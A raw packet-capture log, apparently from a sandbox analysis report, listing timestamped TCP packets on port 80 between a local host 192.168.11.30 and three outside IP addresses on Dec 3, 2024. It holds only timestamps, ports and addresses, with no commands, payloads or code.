                                                                                                  Dec 3, 2024 09:49:11.874504089 CET8049887104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:11.874512911 CET8049887104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:11.874680996 CET4988780192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:12.436386108 CET8049887104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:12.436399937 CET8049887104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:12.436445951 CET8049887104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:12.436501026 CET8049887104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:12.436512947 CET8049887104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:12.436521053 CET8049887104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:12.436569929 CET8049887104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:12.436594009 CET4988780192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:12.436636925 CET8049887104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:12.436645985 CET8049887104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:12.436654091 CET8049887104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:12.436666012 CET8049887104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:12.436729908 CET8049887104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:12.436769009 CET4988780192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:12.436815023 CET4988780192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:12.436883926 CET4988780192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:12.437191010 CET8049887104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:12.437243938 CET8049887104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:12.437313080 CET8049887104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:12.437367916 CET8049887104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:12.437376022 CET8049887104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:12.437385082 CET8049887104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:12.437448025 CET4988780192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:12.437552929 CET4988780192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:12.437736034 CET4988780192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:12.438034058 CET8049887104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:12.438090086 CET8049887104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:12.438162088 CET8049887104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:12.438216925 CET8049887104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:12.438231945 CET8049887104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:12.438246965 CET8049887104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:12.438321114 CET4988780192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:12.438473940 CET4988780192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:12.438899040 CET8049887104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:12.438947916 CET8049887104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:12.439003944 CET8049887104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:12.439064026 CET8049887104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:12.439080000 CET8049887104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:12.439090014 CET8049887104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:12.439176083 CET4988780192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:12.439508915 CET4988780192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:12.439804077 CET8049887104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:12.439851999 CET8049887104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:12.439919949 CET8049887104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:12.439973116 CET8049887104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:12.440068007 CET4988780192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:12.440404892 CET4988780192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:12.703883886 CET4988780192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:13.720664024 CET4988880192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:13.823462009 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:13.823602915 CET4988880192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:13.826833963 CET4988880192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:13.929589987 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:14.509991884 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:14.510003090 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:14.510292053 CET4988880192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:15.066570044 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.066637039 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.066692114 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.066699982 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.066767931 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.066777945 CET4988880192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:15.066792965 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.066802979 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.066809893 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.066817999 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.066852093 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.066909075 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.066910982 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.067078114 CET4988880192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:15.067157984 CET4988880192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:15.067394972 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.067512989 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.067539930 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.067548037 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.067555904 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.067568064 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.067667007 CET4988880192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:15.067667007 CET4988880192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:15.067797899 CET4988880192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:15.068187952 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.068294048 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.068351030 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.068358898 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.068366051 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.068373919 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.068465948 CET4988880192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:15.068489075 CET4988880192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:15.068690062 CET4988880192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:15.069096088 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.069205046 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.069257975 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.069266081 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.069273949 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.069281101 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.069339991 CET4988880192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:15.069463015 CET4988880192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:15.069510937 CET4988880192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:15.069962978 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.070071936 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.070127010 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.070135117 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.070142031 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.070192099 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.070204020 CET4988880192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:15.070321083 CET4988880192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:15.070419073 CET4988880192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:15.070832968 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.070944071 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.071005106 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.071012974 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.071021080 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.071027994 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.071120977 CET4988880192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:15.071120977 CET4988880192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:15.071264029 CET4988880192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:15.071685076 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.071737051 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.071791887 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:15.071913958 CET4988880192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:15.072053909 CET4988880192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:15.072927952 CET4988880192.168.11.30104.21.7.187
                                                                                                  Dec 3, 2024 09:49:15.175637007 CET8049888104.21.7.187192.168.11.30
                                                                                                  Dec 3, 2024 09:49:20.878592014 CET4988980192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:49:21.193620920 CET8049889103.230.159.86192.168.11.30
                                                                                                  Dec 3, 2024 09:49:21.193734884 CET4988980192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:49:21.198473930 CET4988980192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:49:21.513566017 CET8049889103.230.159.86192.168.11.30
                                                                                                  Dec 3, 2024 09:49:21.514264107 CET8049889103.230.159.86192.168.11.30
                                                                                                  Dec 3, 2024 09:49:21.514343023 CET8049889103.230.159.86192.168.11.30
                                                                                                  Dec 3, 2024 09:49:21.514489889 CET4988980192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:49:22.701941013 CET4988980192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:49:23.718910933 CET4989080192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:49:24.037218094 CET8049890103.230.159.86192.168.11.30
                                                                                                  Dec 3, 2024 09:49:24.037347078 CET4989080192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:49:24.042565107 CET4989080192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:49:24.360564947 CET8049890103.230.159.86192.168.11.30
                                                                                                  Dec 3, 2024 09:49:24.361619949 CET8049890103.230.159.86192.168.11.30
                                                                                                  Dec 3, 2024 09:49:24.361629009 CET8049890103.230.159.86192.168.11.30
                                                                                                  Dec 3, 2024 09:49:24.361908913 CET4989080192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:49:25.544641972 CET4989080192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:49:26.561256886 CET4989180192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:49:26.876632929 CET8049891103.230.159.86192.168.11.30
                                                                                                  Dec 3, 2024 09:49:26.876789093 CET4989180192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:49:26.881542921 CET4989180192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:49:26.881594896 CET4989180192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:49:27.196710110 CET8049891103.230.159.86192.168.11.30
                                                                                                  Dec 3, 2024 09:49:27.196718931 CET8049891103.230.159.86192.168.11.30
                                                                                                  Dec 3, 2024 09:49:27.197330952 CET8049891103.230.159.86192.168.11.30
                                                                                                  Dec 3, 2024 09:49:27.197413921 CET8049891103.230.159.86192.168.11.30
                                                                                                  Dec 3, 2024 09:49:27.197643995 CET4989180192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:49:28.387775898 CET4989180192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:49:29.404710054 CET4989280192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:49:29.717134953 CET8049892103.230.159.86192.168.11.30
                                                                                                  Dec 3, 2024 09:49:29.717310905 CET4989280192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:49:29.720982075 CET4989280192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:49:30.033376932 CET8049892103.230.159.86192.168.11.30
                                                                                                  Dec 3, 2024 09:49:30.034149885 CET8049892103.230.159.86192.168.11.30
                                                                                                  Dec 3, 2024 09:49:30.034457922 CET8049892103.230.159.86192.168.11.30
                                                                                                  Dec 3, 2024 09:49:30.034730911 CET4989280192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:49:30.035614967 CET4989280192.168.11.30103.230.159.86
                                                                                                  Dec 3, 2024 09:49:30.347841024 CET8049892103.230.159.86192.168.11.30
                                                                                                  Dec 3, 2024 09:49:35.172441959 CET4989380192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:35.517684937 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:35.517905951 CET4989380192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:35.523061991 CET4989380192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:35.868457079 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:35.869956017 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:35.870021105 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:35.870069027 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:35.870083094 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:35.870094061 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:35.870105982 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:35.870136976 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:35.870203972 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:35.870227098 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:35.870244026 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:35.870275974 CET4989380192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:35.870373964 CET4989380192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:35.870460033 CET4989380192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:36.215636969 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.215728998 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.215738058 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.215747118 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.215850115 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.215858936 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.215866089 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.215939045 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.215939999 CET4989380192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:36.215955973 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.215970993 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.216005087 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.216012001 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.216021061 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.216027975 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.216037035 CET4989380192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:36.216037035 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.216059923 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.216068029 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.216084957 CET4989380192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:36.216130018 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.216140032 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.216147900 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.216224909 CET4989380192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:36.216224909 CET4989380192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:36.216322899 CET4989380192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:36.216322899 CET4989380192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:36.216419935 CET4989380192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:36.216470003 CET4989380192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:36.561383009 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.561394930 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.561522007 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.561530113 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.561537981 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.561606884 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.561615944 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.561624050 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.561629057 CET4989380192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:36.561630964 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.561639071 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.561683893 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.561692953 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.561700106 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.561793089 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.561801910 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.561810017 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.561815977 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.561822891 CET804989343.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:36.561825037 CET4989380192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:36.561872959 CET4989380192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:36.561923027 CET4989380192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:36.561971903 CET4989380192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:36.562068939 CET4989380192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:37.026582003 CET4989380192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:38.043149948 CET4989480192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:38.377640963 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:38.377896070 CET4989480192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:38.382503986 CET4989480192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:38.716955900 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:38.718569994 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:38.718663931 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:38.718672037 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:38.718681097 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:38.718765020 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:38.718772888 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:38.718779087 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:38.718786955 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:38.718841076 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:38.718848944 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:38.719104052 CET4989480192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:38.719104052 CET4989480192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:38.719104052 CET4989480192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:38.719104052 CET4989480192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:39.053760052 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.053772926 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.053781033 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.053790092 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.053894043 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.053904057 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.053965092 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.053972960 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.053982019 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.054004908 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.054013968 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.054058075 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.054066896 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.054075003 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.054085016 CET4989480192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:39.054085016 CET4989480192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:39.054090977 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.054100037 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.054178953 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.054188013 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.054195881 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.054203987 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.054255962 CET4989480192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:39.054255962 CET4989480192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:39.054255962 CET4989480192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:39.054445982 CET4989480192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:39.054445982 CET4989480192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:39.054445982 CET4989480192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:39.054594040 CET4989480192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:39.388554096 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.388624907 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.388633966 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.388752937 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.388761997 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.388768911 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.388834953 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.388843060 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.388864040 CET4989480192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:39.388885975 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.388894081 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.388900995 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.388909101 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.388916969 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.388963938 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.388972044 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.388978958 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.388984919 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.388991117 CET804989443.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:39.389034986 CET4989480192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:39.389034986 CET4989480192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:39.389034986 CET4989480192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:39.389206886 CET4989480192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:39.885320902 CET4989480192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:40.901901960 CET4989580192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:41.246802092 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:41.247014999 CET4989580192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:41.252140999 CET4989580192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:41.252188921 CET4989580192.168.11.3043.156.176.253
                                                                                                  Dec 3, 2024 09:49:41.596425056 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:41.596432924 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:41.598032951 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:41.598145962 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:41.598154068 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:41.598162889 CET804989543.156.176.253192.168.11.30
                                                                                                  Dec 3, 2024 09:49:41.598222971 CET804989543.156.176.253192.168.11.30
